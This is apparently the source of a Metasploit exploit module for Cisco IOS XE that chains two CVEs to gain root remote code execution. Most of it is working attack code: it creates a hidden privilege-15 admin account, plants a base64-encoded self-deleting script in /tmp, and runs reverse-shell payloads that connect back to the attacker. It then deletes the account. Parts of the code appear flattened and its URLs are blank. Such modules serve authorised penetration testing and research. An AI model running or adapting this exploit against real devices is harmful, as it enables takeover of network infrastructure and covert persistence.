# This module requires Metasploit:  
# Current source:  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HTTP::CiscoIosXe  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Retry  
prepend Msf::Exploit::Remote::AutoCheck  
def initialize(info = {})  
'Name' => 'Cisco IOX XE Unauthenticated RCE Chain',  
'Description' => %q{  
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE  
devices which have the Web UI exposed. An attacker can execute a payload with root privileges.  
The vulnerable IOS XE versions are:  
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,  
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,  
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,  
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,  
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,  
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,  
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,  
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,  
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,  
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,  
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,  
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,  
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,  
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,  
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,  
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,  
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,  
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,  
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,  
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,  
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,  
'License' => MSF_LICENSE,  
'Author' => [  
'sfewer-r7', # MSF Exploit  
'References' => [  
['CVE', '2023-20198'],  
['CVE', '2023-20273'],  
# Vendor advisories.  
['URL', ''],  
['URL', ''],  
# Vendor list of (205) vulnerable versions.  
['URL', ''],  
# Technical details on CVE-2023-20198.  
['URL', ''],  
['URL', ''],  
# Technical details on CVE-2023-20273.  
['URL', ''],  
# Full details of a successful exploitation attempt from a honey pot.  
['URL', ''],  
'DisclosureDate' => '2023-10-16',  
'Privileged' => true,  
'Platform' => %w[linux unix],  
'Arch' => [ARCH_CMD],  
'Targets' => [  
# Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:  
# cmd/linux/http/x64/meterpreter/reverse_tcp  
# cmd/linux/http/x64/shell/reverse_tcp  
# cmd/linux/http/x86/shell/reverse_tcp  
'Linux Command',  
'Platform' => 'linux',  
'Arch' => [ARCH_CMD]  
# Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:  
# cmd/unix/python/meterpreter/reverse_tcp  
# cmd/unix/reverse_bash  
'Unix Command',  
'Platform' => 'unix',  
'Arch' => [ARCH_CMD]  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
# We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of  
# 'global' should work, but exposing this as an option will allow for usage in more complex network setups.  
# A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to  
# inspect a devices configuration to see an appropriate VRF to use.'CISCO_VRF_NAME', [ true, "The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.", 'global']),  
# We may need to try and execute a command a second time if it fails the first time. This option is the maximum  
# number of seconds to keep trying.'CISCO_CMD_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to execute a command.', 30])  
def check  
# First, a get request to the root of the Web UI, this lets us verify the target is a Cisco IOS XE device with  
# the Web UI exposed (which is the vulnerable component).  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri('webui')  
return CheckCode::Unknown('Connection failed') unless res  
# We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content.  
if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?(''))  
return CheckCode::Unknown('Web UI not detected')  
# By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number,  
# so if this request succeeds, then we known the target is vulnerable.  
res = run_cli_command('show version', Mode::PRIVILEGED_EXEC)  
# If the above request failed, then the target is safe.  
return CheckCode::Safe unless res  
version = 'Cisco IOS XE Software'  
# If we can pull out the version number via a regex, we do. If this fails, the target is still vulnerable  
# (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format  
# for the version information so our regex wont work.  
# Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2  
if res =~ /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/  
version = Regexp.last_match(1)  
def exploit  
admin_username = rand_text_alpha(8)  
admin_password = rand_text_alpha(8)  
# Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.  
unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)  
fail_with(Failure::UnexpectedReply, 'Failed to create admin user')  
print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'")  
# Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...  
# A shell script to execute the Metasploit payload. Will delete itself upon execution.  
bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"  
# The location of our bootstrap script.  
bootstrap_file = "/tmp/#{Rex::Text.rand_text_alpha(8)}"  
# NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and  
# 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line.  
# Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems  
# with restricted chars, and leverage openssl to decode and write the contents to disk.  
success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do  
next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", admin_username, admin_password)  
unless success  
fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file')  
# Make the script executable.  
success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do  
next run_os_command("chmod +x #{bootstrap_file}", admin_username, admin_password)  
unless success  
fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file')  
# Execute our bootstrap script via, and with 'global' virtual routing and forwarding (vrf) by  
# default. The VRF allows the executed script to route its network traffic back the the framework. The  
# scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.  
success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do  
next run_os_command("/usr/binos/conf/ #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", admin_username, admin_password)  
unless success  
fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file')  
print_status("Removing user '#{admin_username}'")  
# Leverage CVE-2023-20198 to remove the admin account we previously created.  
unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)  
print_warning('Failed to remove user')  